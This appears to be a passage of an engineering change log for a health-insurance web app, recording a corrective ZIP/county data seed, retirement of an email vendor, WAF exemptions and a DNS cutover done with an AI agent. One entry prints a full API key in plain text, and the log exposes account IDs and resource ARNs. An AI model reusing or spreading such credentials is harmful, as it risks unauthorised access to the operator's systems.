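}

// Hypothetical sketch of the post-county-pick branch in the calculator hook.
function nextPhase(selectedCounty) {
  return selectedCounty.sbeRedirect ? "state_marketplace" : "eligibility";
}
```

The empty-array check comes first because `[].every(...)` is `true` in JavaScript, so without it a ZIP with no docs would be treated as fully SBE.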

Docs:

  • docs/infrastructure/data-sources.md — CMS Marketplace API replaces Census ZCTA as canonical SBE-ZIP source. Original Census source marked SUPERSEDED.
  • This change-log entry (the original 17:30Z entry below stays intact as historical record).

Apply results (identical on staging + prod)

| Step | Operation | Count |
| --- | --- | --- |
| Rollback (broken seed) | seed-sbe-zips.js --rollback removed 13,015 docs (sbeRedirect + no countyFips) | 13,015 |
| Apply (corrective) | seed-sbe-zips-from-cms.js --apply inserted CMS-sourced per-county docs | 17,537 |
| Federal/NY preserved | Guard 1 left existing federal-30 + NY county docs untouched | 30,326 (unchanged) |
| Fix-stale-zips style | 12 entries from fix-stale-zips.js left untouched | 12 (unchanged) |
| Total docs after corrective seed | - | 47,875 |

Math identity: 30,326 + 12 + 17,537 = 47,875 ✓ on both clusters.

Why 17,537 > original 13,015: CMS returns multi-county for many SBE-state ZIPs (3,510 ZIPs are multi-county per the snapshot), and cross-state border ZIPs now correctly get separate docs per CMS-returned county.

Federal data gaps surfaced (logged for follow-up — federal data has its own PUF-driven ingest pipeline; auto-insert deliberately not done here):

  • zip=30555 → CMS reports TN/47139 Polk County (we don't have)
  • zip=30559 → CMS reports NC/37039 Cherokee County (we don't have)
  • zip=88240 → CMS reports TX/48165 Gaines County (we don't have)

CMS data gaps: 4 ZIPs returned 0 counties from CMS (same family as 02101 from the temp-fix's edge case). These ZIPs continue to fall through to the existing CMS API fallback in route.ts (defense-in-depth).

Verification ​

Probe matrix on https://askflorence.health/api/counties (post route+hook deploy):

SBE-only ZIPs (single SBE state, single redirect):

  • 90001 (CA), 02115 (MA), 06103 (CT), 80202 (CO), 21201 (MD), 02903 (RI), 89101 (NV), 87501 (NM), 19103 (PA), 98101 (WA), 20001 (DC), 05601 (VT), 04101 (ME), 60601 (IL) → all { sbeRedirect: ... } HTTP 200 from MongoDB

Cross-state border ZIPs (NEW — multi-county with per-county SBE):

  • 03579 (NH+ME) → { counties: [{NH/Coos, no sbeRedirect}, {ME/Oxford County, sbeRedirect: ME}] } ← user picks
  • 19973 (DE+MD) → { counties: [{DE/Sussex, no sbeRedirect}, {MD/Dorchester County, sbeRedirect: MD}] }
  • (similar pattern for 24604, 30165, etc.)

Federal/NY happy paths (unchanged):

  • 84094 (UT), 10282 (NY), 19701 (DE), 75001 (TX) → counties payload from MongoDB unchanged

Compliance posture

| Framework | Control | Posture |
| --- | --- | --- |
| HIPAA | §164.312(c) Integrity | Three-guard safety + Atlas audit log proves no mutation of verified federal/NY data |
| HIPAA | §164.312(b) Audit controls | All writes recorded in Atlas audit log; CloudTrail on Secrets Manager fetches |
| SOC 2 TSC | CC6.1 / CC7.1 / CC8.1 | Idempotent script + dry-run gate + reviewed apply + dated change-log entry + IaC |
| NIST 800-53 R4 (MARS-E 2.2) | CM-3 / SI-7 | Reproducible CMS snapshot + tier-1.5-ready data + corrective change documented |
| EDE Phase 3 | Data provenance | Source URL committed in script; CMS-canonical FIPS enables byte-for-byte audit comparability with CMS |

Net effect ​

  • Pre-correction (broken seed): SBE redirect docs had no FIPS — couldn't be audited against CMS. Cross-state border ZIPs served only the federal portion. Architectural promise (byte-for-byte CMS parity) violated.
  • Post-correction: every SBE doc carries CMS-canonical (zip, countyFips, county, state). Cross-state border ZIPs return multi-county responses; user picks the county they live in (federal → plan flow, SBE → marketplace redirect). Tier-1.5 SBE audit becomes possible.

Rollback

```bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
  --secret-id prod/mongodb/app-write --query SecretString --output text) \
  node scripts/db/seed-sbe-zips-from-cms.js --rollback
```

Deletes only docs with _seedSource: "cms-2026-04-30". Federal/NY data + fix-stale-zips entries protected by construction.

Annual refresh playbook ​

Embedded in scripts/db/seed-sbe-zips-from-cms.js header docstring + summarized in data-sources.md. At plan-year transition: re-run build-cms-snapshot.js → review STATE_BASED_MARKETPLACES → dry-run → staging apply + verify → prod apply + verify → tier audits → change-log entry.


2026-04-30T17:30Z — SBE-state ZIP MongoDB-first ingest (retires CMS fallback dependence) ​

⚠ SUPERSEDED 2026-05-01T01:22Z: this seed shipped without countyFips and used Census instead of CMS as the source. See the entry above for the corrective seed that replaced it. This entry is preserved as a historical record.

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211 via Atlas user app_writer_plans + prod app-write from Secrets Manager); agent: Claude Opus 4.7
Linked: Issue #68 (proper data-side fix). Follow-up to commit 1e5258a (CMS API fallback temp fix, 2026-04-30T07:55Z, comment on #47).

Why ​

The temp fix that landed earlier today routed every SBE-state ZIP request through a CMS Marketplace API call to learn the state. That worked but introduced an external dependency on the consumer hot path, ~250ms first-hit latency, and a CMS-API-outage failure mode. The intended long-term architecture (established by Issue #49 / commit 330871e for federal-30 + NY plans) is MongoDB-first for every U.S. ZIP. This change seeds every SBE-state ZIP into MongoDB with redirect-only docs so /api/counties returns sbeRedirect from owned data without external API calls.

What shipped ​

Code changes:

  • src/lib/constants.ts — added IL: "Get Covered Illinois (getcovered.illinois.gov)" to STATE_BASED_MARKETPLACES. IL launched its SBE in 2025 plan year; prior to this change IL was a real coverage gap (SBE_STATES included IL but the marketplace map didn't, so IL ZIPs returned 404 with no redirect banner).
  • scripts/db/seed-sbe-zips.js — new ingest script. Three modes: --dry-run (default), --apply, --rollback. Optional --verify-cms-sample runs 200-ZIP CMS cross-check at 1 req/sec for source-quality validation. ~430 lines including embedded refresh playbook in header docstring.
  • scripts/db/data/sbe-zip-state-2020.csv — committed snapshot of SBE-state ZIPs from U.S. Census 2020 ZCTA-to-County relationship file. 13,084 rows (zip,state,county_fips_sample). Reproducible, airgap-safe.
  • docs/infrastructure/data-sources.md — new doc covering the data ingestion pipeline lineage, refresh cadence, conflict log archive (45 border-ZIPs not auto-redirected), provenance + audit trail.
  • docs/.vitepress/config.ts — sidebar entry for the new doc.

Data writes (idempotent, three-guard safety):

| Mongo cluster | Operations | Result |
| --- | --- | --- |
| Staging Atlas (project askflorence-staging, M0) | 13,027 inserts + 12 unchanged + 45 skipped (CONFLICT) | Total docs 30,338 → 43,353 |
| Prod Atlas (project AskFlorence, M10 HIPAA, cluster askflorence-prod-01) | 13,027 inserts + 12 unchanged + 45 skipped (CONFLICT) | Total docs 30,338 → 43,353 |

The math checks out identically on both clusters: 30,326 (clean federal/NY, untouched) + 12 (existing fix-stale-zips, untouched) + 13,015 (new redirect-only) = 43,353. Zero federal-30 or NY county docs were mutated, so Guard 2 worked.

The 45 CONFLICT skips are all real border ZIPs spanning SBE + federal counties (ME/NH, DE/MD, VA/WV, NC/VA, MN/SD, etc.). Catalogued in data-sources.md as future per-county-redirect scope. Existing federal data continues to serve them correctly.

How ​

  1. Recon against prod read replica via app-read: confirmed 31 states with plans (federal-30 + NY) and 30,338 zip_county docs.
  2. Source data prep: downloaded Census ZCTA-County file, derived state from county FIPS prefix, filtered to SBE-state ZIPs, committed snapshot CSV.
  3. Staging Atlas access: temporarily added laptop IP to staging Atlas allowlist (project askflorence-staging); used app_writer_plans user from staging Secrets Manager (staging/mongodb/plans-write) for the apply.
  4. Staging dry-run + apply: 13,027 inserts (verified all 19 SBE states + DC + IL).
  5. Staging smoke: 19-probe matrix on stage.askflorence.health/api/counties. All SBE states + IL → sbeRedirect 200 from MongoDB; federal/NY paths unchanged.
  6. Prod apply: same script run with prod app-write URI from Secrets Manager (prod/mongodb/app-write). Identical results.
  7. Prod smoke: 19-probe matrix on askflorence.health/api/counties. All match.
  8. Cleanup: removed temp laptop IP from staging Atlas allowlist.
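
Step 2 derives the state from the county FIPS prefix. A minimal sketch of that derivation, assuming 5-digit county FIPS codes whose first two digits are the state FIPS code. The lookup table here is deliberately partial (a handful of SBE states) and `stateFromCountyFips` is a hypothetical name.

```javascript
// Partial, illustrative map of 2-digit state FIPS codes to postal abbreviations.
const STATE_BY_FIPS_PREFIX = {
  "06": "CA", "08": "CO", "09": "CT", "11": "DC", "17": "IL",
  "23": "ME", "24": "MD", "25": "MA", "32": "NV", "35": "NM",
  "42": "PA", "44": "RI", "50": "VT", "53": "WA",
};

function stateFromCountyFips(countyFips) {
  // CSV parsers may drop leading zeros (6037 instead of "06037"), so re-pad first.
  const fips = String(countyFips).padStart(5, "0");
  return STATE_BY_FIPS_PREFIX[fips.slice(0, 2)] ?? null;
}

console.log(stateFromCountyFips("24045")); // "MD"
console.log(stateFromCountyFips(6037)); // "CA"
```

Returning `null` for prefixes outside the map gives the caller an explicit signal to filter the row out, which matches the "filtered to SBE-state ZIPs" step.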

Verification ​

Probe matrix on https://askflorence.health/api/counties (all returned HTTP 200 with the documented sbeRedirect payload from MongoDB):

| ZIP | State | Marketplace |
| --- | --- | --- |
| 90001 | CA | Covered California |
| 02115 | MA | Massachusetts Health Connector |
| 06103 | CT | Access Health CT |
| 80202 | CO | Connect for Health Colorado |
| 21201 | MD | Maryland Health Connection |
| 02903 | RI | HealthSource RI |
| 89101 | NV | Nevada Health Link |
| 87501 | NM | beWellnm |
| 19103 | PA | Pennie |
| 98101 | WA | Washington Healthplanfinder |
| 20001 | DC | DC Health Link |
| 05601 | VT | Vermont Health Connect |
| 04101 | ME | CoverME.gov |
| 60601 | IL | Get Covered Illinois |
| 84094 (UT, federal) | - | counties payload from MongoDB ✓ unchanged |
| 10282 (NY, owned) | - | counties payload ✓ unchanged |
| 19701 (DE, federal) | - | counties payload ✓ unchanged |
| 75001 (TX, federal) | - | counties payload ✓ unchanged |
| 00000 (invalid) | - | 404 ✓ unchanged |

Compliance posture

| Framework | Control | Posture |
| --- | --- | --- |
| HIPAA | §164.312(c) Integrity | Tier audits + Atlas audit log + script's three guards prove no mutation of verified data |
| HIPAA | §164.312(b) Audit controls | Atlas audit log records every write op; CloudTrail records every Secrets Manager fetch |
| SOC 2 TSC | CC6.1 / CC7.1 / CC8.1 | Idempotent script + dry-run gate + reviewed apply + dated change-log entry |
| NIST 800-53 R4 (MARS-E 2.2) | CM-3 / SI-7 | Three-guard safety + reproducible snapshot + tier audit verification |
| EDE Phase 3 | Data provenance | Source URL committed in script header; CSV snapshot committed for audit reproducibility |

Net effect on the consumer hot path ​

  • Pre-change: /api/counties?zip=<SBE-zip> → MongoDB miss → CMS Marketplace API call → response (~250ms first-hit, cached after)
  • Post-change: /api/counties?zip=<SBE-zip> → MongoDB hit → response (~5ms, federal-NY parity)

The CMS fallback in src/app/api/counties/route.ts is kept as defense-in-depth (per the original plan), now dormant for steady-state traffic. The in-memory cmsFallbackCache should stay near-empty over time — that's the verifiable signal that ingest succeeded. Decision to keep-or-retire the fallback: deferred 1 week post-deploy.
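
A sketch of the MongoDB-first lookup with a dormant CMS fallback and an in-memory cache, to show why a near-empty cache is a useful health signal. Only the `cmsFallbackCache` name comes from this entry; `makeCountyLookup` and the injected `findInMongo` / `fetchFromCms` callbacks are hypothetical.

```javascript
// Hypothetical sketch: owned data first, external API only on a miss.
function makeCountyLookup({ findInMongo, fetchFromCms }) {
  const cmsFallbackCache = new Map();

  async function lookup(zip) {
    const docs = await findInMongo(zip);
    if (docs.length > 0) return { source: "mongodb", docs };

    if (cmsFallbackCache.has(zip)) {
      return { source: "cms-cache", docs: cmsFallbackCache.get(zip) };
    }
    const fetched = await fetchFromCms(zip); // external call, only on a MongoDB miss
    cmsFallbackCache.set(zip, fetched);
    return { source: "cms", docs: fetched };
  }

  // After a successful ingest this should stay close to zero.
  return { lookup, cacheSize: () => cmsFallbackCache.size };
}
```

In this model every cache entry corresponds to a ZIP that MongoDB could not answer, so growth in `cacheSize()` would point at coverage gaps rather than traffic volume.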

Rollback

```bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
  --secret-id prod/mongodb/app-write --query SecretString --output text) \
  node scripts/db/seed-sbe-zips.js --rollback
```

Rollback only removes redirect-only docs (sbeRedirect with no countyFips) — fix-stale-zips entries (countyFips + sbeRedirect both set) are protected and stay intact.

Notes for next refresh ​

  • Census ZCTA refresh cadence: the Census 2020 ZCTA file refreshes ~annually around June. New 2030 boundaries will land circa 2031-2032.
  • Annual at plan-year transition: re-run the script + smoke matrix. Refresh playbook embedded in scripts/db/seed-sbe-zips.js header docstring; mirror in data-sources.md.
  • STATE_BASED_MARKETPLACES drift: cross-check against CMS's Marketplace operating-status page during plan-year transitions. States may transition to/from SBE.
  • Per-county SBE redirect for border ZIPs is a future enhancement tracked on Issue #68 (would change /api/counties response shape + frontend consumer). Not in scope for the seed ingest.

2026-04-30T17:19Z — Phase 11 hardening: Resend retirement (Secrets Manager + IAM + ECS task def) ​

Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211); agent: Claude Opus 4.7
Linked: Issue #47, Issue #57 (vendor BAA register).

Why ​

Apex (askflorence.health) has been on AWS SES exclusively since the Phase 10 cutover (2026-04-24T01:45Z entry below). Vercel-side Resend has been broken since 2026-04-10 (literal \n in API key + Resend domain in failed status, no DKIM CNAMEs). Decision per the Phase 10 entry: retire rather than revive. SES is out of sandbox and verified working end-to-end (4 form-flow probes + 2 direct CLI sends, 0 bounces / 0 complaints / 0 rejects).

What shipped ​

Code (working tree, awaiting commit + CI deploy):

  • src/lib/email.ts — Resend code path stripped; module collapsed to SES-only. ~80 lines deleted.
  • src/app/api/waitlist/route.ts — addToAudience(), RESEND_API_BASE, AUDIENCE_ID, the RESEND_API_KEY not configured 500-gate, the audience-sync block, and resend_ok/resend from response + PostHog all removed. ~50 lines deleted.
  • src/app/api/agents/discovery/route.ts — canSendEmail guard removed; getEmailProvider import dropped.
  • src/app/_home/components/TargetPage.tsx — wired the home Get early access button to POST /api/waitlist (was a no-op since the v0.29.0 home swap; latent bug surfaced + fixed in same session).
  • TS + lint clean.

Infra (applied, this entry's timestamp):

  • infra/envs/prod/ecs.tf — removed RESEND_API_KEY = module.secrets.secret_arns["resend-api-key"] from the secret-injected env vars block.
  • infra/envs/prod/secrets.tf — removed "resend-api-key" entry from the secrets-spec for-each map.
  • terraform plan: 0 to add, 1 to change, 2 to destroy — IAM SecretsRead policy update + Secrets Manager secret destroy + secret-version destroy.
  • ECS task definition rolled FIRST (before terraform apply) because lifecycle { ignore_changes = [container_definitions] } in the ecs-service module means env-var bindings on running tasks aren't tracked by Terraform: pulled :20 task def → filtered out the RESEND_API_KEY secret entry → aws ecs register-task-definition → service updated to :21 → watched rollover stabilize (PRIMARY :21 fully running, ACTIVE :20 drained to 0). THEN terraform apply.
  • Why this order: doing it in reverse would have destroyed the secret + revoked IAM access while running tasks still referenced RESEND_API_KEY in their task def, breaking new task startups (autoscale, restart, deploy).
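
The "pull, filter, re-register" step can be sketched as a transform over the JSON returned by `aws ecs describe-task-definition`. The `stripSecret` helper is hypothetical; the list of fields removed before re-registering reflects the commonly used set of read-only output fields and should be checked against the current ECS API.

```javascript
// Fields present in describe-task-definition output that register-task-definition does not accept.
const READ_ONLY_FIELDS = [
  "taskDefinitionArn", "revision", "status", "requiresAttributes",
  "compatibilities", "registeredAt", "registeredBy",
];

// Hypothetical helper: returns a registerable copy with one secret binding removed.
function stripSecret(taskDefinition, secretName) {
  const next = JSON.parse(JSON.stringify(taskDefinition)); // deep copy, input untouched
  for (const field of READ_ONLY_FIELDS) delete next[field];
  for (const container of next.containerDefinitions || []) {
    if (Array.isArray(container.secrets)) {
      container.secrets = container.secrets.filter((s) => s.name !== secretName);
    }
  }
  return next;
}
```

The result could then be written to a file and passed to `aws ecs register-task-definition --cli-input-json`, after which the service is updated to the new revision before the secret itself is destroyed.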

Verification ​

  • aws sesv2 get-account — ProductionAccessEnabled: true, SendingEnabled: true, EnforcementStatus: HEALTHY.
  • 6 form-flow probes on apex (4 pre-retirement + 2 post-retirement) — all 200 with Mongo writes succeeding; SES per-minute Send metric ticked correctly.
  • 2 direct aws sesv2 send-email CLI tests — both delivered with valid MessageIds.
  • AWS/SES/Send: 12 sends in window, 0 bounces, 0 complaints, 0 rejects.
  • Apex /api/health 200 throughout rollover + apply.
  • aws secretsmanager describe-secret --secret-id prod/resend-api-key → DeletedDate: 2026-04-30T17:19:12-06:00 (default 30-day recovery window, restorable if needed).
  • aws iam get-role-policy askflorence-prod-app-task-execution SecretsRead → resend-api-key ARN no longer in Resource list.

Compliance impact

| Framework | Control | Posture |
| --- | --- | --- |
| HIPAA | §164.308(a)(1)(ii)(B) Risk management | One vendor removed from integration boundary; smaller PHI footprint |
| HIPAA | §164.314(a) BAA scope | Resend BAA chase eliminated (was pending under #57); SES covered under existing AWS Organizations BAA |
| SOC 2 TSC | CC6.6 / CC8.1 | Terraform IaC + this dated entry + CloudTrail in log-archive = audit evidence |
| EDE Phase 3 | MARS-E 2.2 inheritance | No change to inheritance posture |

Rollback ​

Within 30 days: aws secretsmanager restore-secret --secret-id prod/resend-api-key + revert the Terraform commit + terraform apply. Then re-create a Resend account + populate the secret value. The code-side rollback is git revert of the Resend-retirement commit.

After 30 days: secret is permanently destroyed; full re-create from scratch (new Resend account, new API key, new domain DKIM verification). Code-side rollback unchanged.

Practical answer: if there's any reason to revive Resend, do it before 2026-05-30T17:19Z.

Vercel — intentionally not touched ​

Per user direction ("leave it as is, I'll stop using it instead"), Vercel project's RESEND_API_KEY env var stays. Vercel-side emails have been broken for 3+ weeks anyway (key + domain both invalid since 2026-04-10). Vercel will be deprecated separately.


2026-04-30T09:00Z — WAF scoped exemptions: PostHog /ingest/* + social-crawler User-Agent allowlist ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7
Linked: Issue #47 Phase 11 hardening; comments at 2026-04-30T08:05Z (PostHog block) and Telegram-bot finding flagged in-session.

Why ​

Two managed-rule false-positive families surfaced post Phase 10 cutover, both expected when moving from Vercel default protections onto a real WAF on production traffic:

  1. PostHog analytics returning zero events. Browser console showed POST /ingest/e/ and /ingest/s/ returning HTTP 403 from WAF. PostHog dashboard receiving no events from apex traffic. Cause: AWSManagedRulesCommonRuleSet and AWSManagedRulesSQLiRuleSet pattern-match PostHog's gzip-compressed event payloads as suspicious bodies. The path is a first-party Next.js rewrite — no SQL or user input surface there.

  2. Social-media link previews broken on Telegram (149.154.0.0/16 hits AWSManagedRulesAmazonIpReputationList), and the same family of false-positives expected to affect Facebook, LinkedIn, Slack, Discord, Twitter, WhatsApp, Apple iMessage, Reddit, Skype/Teams. Cloud datacenter CIDRs flagged wholesale by commercial threat-intel feeds. Direct funnel risk for consumer + agent acquisition flows that depend on shareable links.

What shipped ​

Single Terraform module change, applied to both environments:

  • infra/modules/cloudfront-waf/main.tf — added scope_down_statement blocks to four managed_rule_group_statement rules:
    • Priority 0 AWSManagedRulesCommonRuleSet — exempt URI STARTS_WITH /ingest/
    • Priority 20 AWSManagedRulesSQLiRuleSet — exempt URI STARTS_WITH /ingest/
    • Priority 30 AWSManagedRulesAmazonIpReputationList — exempt User-Agent CONTAINS (lowercase) any allowlisted crawler substring
    • Priority 40 AWSManagedRulesAnonymousIpList — same UA allowlist exemption
  • infra/modules/cloudfront-waf/variables.tf — new posthog_proxy_uri_prefix (default "/ingest/") and social_crawler_user_agents (default 11-entry list: telegrambot, facebookexternalhit, facebookcatalog, linkedinbot, slackbot, discordbot, twitterbot, whatsapp, skypeuripreview, redditbot, applebot). Variable validation enforces ≥2 entries on the UA list (WAFv2 or_statement requirement).
  • docs/infrastructure/cloudfront-waf-setup.md — new doc with full rule stack, scoped-exemption rationale, compliance mapping (HIPAA / SOC 2 / NIST 800-53 R4 / EDE Phase 3), residual-coverage proof, verification curls, operational runbook.
  • docs/.vitepress/config.ts — new sidebar entry under Infrastructure for "CloudFront + WAFv2".

Rules NOT changed (defense-in-depth preserved):

  • AWSManagedRulesKnownBadInputsRuleSet (priority 10) — runs on every request including /ingest/* and crawler UAs.
  • RateBasedBlanket 2000 req/5min/IP (priority 100) — applies universally.
  • All other rule groups remain in BLOCK mode (override none {} left intact).
  • WAF logging unchanged: every request still recorded to the CloudWatch log group with action, terminatingRuleId, ruleGroupList for forensics.
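
The scope-downs above can be modelled as a predicate over a request, to make the residual coverage explicit. This is a JavaScript model of the described behavior, not the Terraform or WAF evaluation itself; `inspectingRuleGroups` is a hypothetical name, and the prefix and UA list mirror the documented defaults.

```javascript
// Model only: which rule groups still inspect a given request after the scope-downs.
const POSTHOG_PROXY_URI_PREFIX = "/ingest/";
const SOCIAL_CRAWLER_USER_AGENTS = [
  "telegrambot", "facebookexternalhit", "facebookcatalog", "linkedinbot",
  "slackbot", "discordbot", "twitterbot", "whatsapp", "skypeuripreview",
  "redditbot", "applebot",
];

function inspectingRuleGroups({ uri, userAgent = "" }) {
  const isIngest = uri.startsWith(POSTHOG_PROXY_URI_PREFIX);
  const ua = userAgent.toLowerCase();
  const isCrawler = SOCIAL_CRAWLER_USER_AGENTS.some((s) => ua.includes(s));

  const groups = [];
  if (!isIngest) groups.push("AWSManagedRulesCommonRuleSet"); // priority 0
  groups.push("AWSManagedRulesKnownBadInputsRuleSet"); // priority 10, never exempted
  if (!isIngest) groups.push("AWSManagedRulesSQLiRuleSet"); // priority 20
  if (!isCrawler) groups.push("AWSManagedRulesAmazonIpReputationList"); // priority 30
  if (!isCrawler) groups.push("AWSManagedRulesAnonymousIpList"); // priority 40
  groups.push("RateBasedBlanket"); // priority 100, never exempted
  return groups;
}

console.log(inspectingRuleGroups({ uri: "/ingest/e/", userAgent: "Mozilla/5.0" }).length); // 4
```

Even a request that matches both exemptions is still inspected by the known-bad-inputs group and the rate limit, which is the defense-in-depth claim made in the list above.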

How ​

Module + env apply pattern, staging-then-prod:

  1. terraform fmt -recursive modules/cloudfront-waf/ + terraform validate in infra/envs/staging/ → green.
  2. terraform plan -target=module.cloudfront_staging → 0 to add, 1 to change, 0 to destroy (web ACL modified in place with all 4 scope-downs).
  3. terraform apply -target=module.cloudfront_staging -auto-approve → applied; web ACL 4d7e1072-04b4-466b-b67a-5ce03036757d.
  4. Staging verified with 7-probe curl matrix (PostHog 400, SQLi-on-counties 403, normal-traffic 200, crawler UAs 200) — all expected results.
  5. terraform plan -target=module.cloudfront_prod → same shape (1 to change).
  6. terraform apply -target=module.cloudfront_prod -auto-approve → applied to web ACL e05c650b-4dec-456a-af42-3ec0a7c3dcdc.
  7. Prod verified with 10-probe curl matrix (PostHog /ingest/e/ and /ingest/s/ both 400 from PostHog NOT 403 from WAF; SQLi-on-counties 403; home/api 200; TelegramBot/facebookexternalhit/LinkedInBot/Slackbot UAs all 200; /api/health env=prod).

CloudTrail in log-archive captures wafv2:UpdateWebACL events for both apply runs (machine-readable change record per SOC 2 CC8.1 + EDE Phase 3 CM-3).

Compliance impact ​

The audit story strengthens with this change. Auditor walkthrough:

| Framework | Control | Posture |
| --- | --- | --- |
| HIPAA | §164.308(a)(1)(ii)(B) Risk management | Documented risk-based decision with compensating controls |
| HIPAA | §164.312(b) Audit controls | All requests still logged to CloudWatch; WAF action field shows whether scope-down fired |
| SOC 2 TSC | CC6.1 / CC6.6 boundary protection | All rules remain BLOCK; exemptions are payload/identity-scoped not blanket allows |
| SOC 2 TSC | CC8.1 change management | Terraform IaC + reviewed change + this dated change-log = textbook evidence |
| NIST 800-53 R4 (MARS-E 2.2) | SC-7 boundary, SI-4 monitoring, AU-2/AU-3 audit | All preserved with ≥4 enforcement layers per request |
| EDE Phase 3 | MARS-E 2.2 inheritance | Both exemptions apply only to public-data paths (no PHI / PII / FTI / application / cms_hub data class today) |

Forward-compatibility checkpoints documented in cloudfront-waf-setup.md → "When to re-evaluate": Phase 5 cutover (agent portal/member dashboard ship), EDE Phase 3 audit prep (~Sept 2026), PostHog vendor decision (Phase 11).

Rollback ​

If a scope-down causes unforeseen behavior:

```bash
# Disable PostHog exemption only:
# Set posthog_proxy_uri_prefix = "" in module call (or remove the override).
# Apply. Common + SQLi resume inspection of /ingest/*.

# Disable crawler UA exemption only:
# Set social_crawler_user_agents = [] in module call.
# Apply. IpReputation + AnonymousIp resume inspection of all UAs.

# Full revert: revert the commit. terraform apply restores prior rule structure.
```

WAF state propagation is fast (under 60 seconds on managed rule changes); rollback is a single terraform apply away.


2026-04-24T01:45Z — Phase 10 DNS cutover + follow-up fixes (S3 uploads, email provider, Vercel write bug) ​

Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211 + mgmt 778477254880) + Cloudflare dashboard; agent: Claude Opus 4.7
Linked: Issue #47 Phase 10.

Why ​

Phase 8 built the prod AWS stack and served it on prod-canary.askflorence.health. Phase 9 validated end-to-end parity vs Vercel across 60/60 HTTP probes. Phase 10 moves the production apex DNS so real users hit the AWS stack. Along the way, three latent bugs surfaced and got fixed properly.

What shipped ​

DNS cutover (Cloudflare zone askflorence.health):

  • askflorence.health apex: A 216.198.79.1 (Proxied) → CNAME d1pnfyzua893hx.cloudfront.net (DNS only), TTL 300s
  • www.askflorence.health: CNAME askflorence.health (Proxied) → CNAME d1pnfyzua893hx.cloudfront.net (DNS only), TTL 300s
  • Vercel proxy path retired from DNS. Vercel deployment kept running as rollback target for 48h.

Follow-up fix 1: Vercel pre-existing write bug. Audit discovered MONGODB_WRITE_URI="" on Vercel prod env (empty string since 2026-04-16 per the Phase 8 entry, so roughly 8 days stale at cutover). Consumer + agent waitlist + survey writes on Vercel had been silently failing with "MONGODB_URI_WAITLIST_WRITE or MONGODB_URI_SURVEY_WRITE or MONGODB_WRITE_URI must be set" for that entire window. Rotated the app-write password on prod Atlas via atlas dbusers update, populated prod/mongodb/app-write in Secrets Manager, pushed the same URI to Vercel env, re-deployed Vercel. Writes resumed on Vercel (which stays warm as the Phase 10 rollback).

Follow-up fix 2 — Prod SES in sandbox + Resend key bug. Post-cutover smoke surfaced email failures:

  • SES in sandbox mode: only taha@askflorence.health verified. agents@askflorence.health ops-notifications silently failing.
  • Attempted Resend fallback via EMAIL_PROVIDER=resend to route through Resend while SES waited for prod-access approval.
  • Resend failed: API key is invalid. Traced to the exact same literal-\n bug class as the CMS_API_KEY had — Vercel stored re_HDRhaUUw_6WV5EDvoRj1huQNRazQiNqki\n (backslash-n literal at end). Cleaned the key, re-tested — Resend now returns updates.askflorence.health domain is not verified (domain status "failed" on the Resend account since 2026-04-10; no Resend DKIM records were ever published to Cloudflare). Vercel email sending has therefore also been broken for ~2 weeks, compounding with the empty MONGODB_WRITE_URI bug above.
  • Decision: flip EMAIL_PROVIDER back to ses on prod, file AWS SES production-access request with conservative volume framing (under 100/day current, under 500/day ceiling 60d, under 5k/day through end of 2026). updates.askflorence.health is properly verified on the prod SES account (DKIM + MAIL FROM + DMARC, all SUCCESS per Phase 8). Resend retires per the original Phase 11 plan rather than being revived.
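The literal-\n bug class described above (a secret stored with a trailing backslash followed by the letter n, rather than a real newline) can be caught before a key ever reaches a provider. The following is a minimal sketch, not the project's actual code; the function names and the example key are hypothetical.

```python
def has_literal_newline(raw: str) -> bool:
    """True when the value ends in a literal backslash-n or backslash-r."""
    return raw.rstrip().endswith(("\\n", "\\r"))


def clean_secret(raw: str) -> str:
    """Strip trailing whitespace and trailing literal \\n / \\r sequences.

    Loops until the value stops changing, so mixed tails such as a
    literal backslash-n followed by a real newline are handled too.
    """
    value = raw
    while True:
        stripped = value.rstrip()  # real newline, CR, space, tab
        for suffix in ("\\n", "\\r"):
            if stripped.endswith(suffix):
                stripped = stripped[: -len(suffix)]
        if stripped == value:
            return value
        value = stripped
```

A check like has_literal_newline could run at application start-up against every secret-bearing env var, so a malformed value fails loudly instead of surfacing later as "API key is invalid".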

Follow-up fix 3 — Agent file upload path dead on AWS prod. Smoke test of /api/agents/discovery/upload surfaced missing IAM + env vars. Proper Terraform fix landed:

  • New infra/envs/management/s3-askflorence-data.tf — manages the bucket policy on askflorence-data (mgmt account, 778477254880). Preserves existing DenyNonSSLRequests statement and adds AllowProdEcsTaskRolePutAgentSurveyUploads statement granting arn:aws:iam::039624954211:role/askflorence-prod-app-task s3:PutObject on arn:aws:s3:::askflorence-data/agent-survey-uploads/*. Does NOT take ownership of the bucket resource itself (bucket predates Terraform).
  • infra/envs/prod/ecs.tf — task role gains inline policy S3AgentSurveyUploadsWrite granting s3:PutObject on the same prefix; task def env var S3_AGENT_SURVEY_BUCKET=askflorence-data.
  • No KMS grants needed: mgmt CMK alias/askflorence-data key policy already permits any org principal to GenerateDataKey/Decrypt/DescribeKey via s3.us-east-1.amazonaws.com (legacy Tfstate-era statement, ViaService-bound).
  • GuardDuty Malware Protection for S3 (enabled Phase 2.5) continues scanning all new uploads under agent-survey-uploads/ regardless of writer. Scan-tag on successful upload.
  • Verified end-to-end: POST /api/agents/discovery/upload with a real PDF returned HTTP 200 and wrote to agent-survey-uploads/custom/1776993996441-.../consent-template.pdf via cross-account role-based auth.
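For orientation, the two-statement bucket policy described above could look roughly like the document built below. This is a sketch under assumptions: the Sids, role ARN, bucket and prefix come from this entry, but the body of DenyNonSSLRequests is the conventional aws:SecureTransport form and is assumed, since only its name is recorded here. The helper names are hypothetical.

```python
import json

BUCKET = "askflorence-data"
PREFIX = "agent-survey-uploads/"
TASK_ROLE_ARN = "arn:aws:iam::039624954211:role/askflorence-prod-app-task"


def build_bucket_policy() -> dict:
    """Return the policy as a plain dict (illustrative, not the applied document)."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                # Assumed body: only the Sid of this statement is given in the log.
                "Sid": "DenyNonSSLRequests",
                "Effect": "Deny",
                "Principal": "*",
                "Action": "s3:*",
                "Resource": [f"arn:aws:s3:::{BUCKET}", f"arn:aws:s3:::{BUCKET}/*"],
                "Condition": {"Bool": {"aws:SecureTransport": "false"}},
            },
            {
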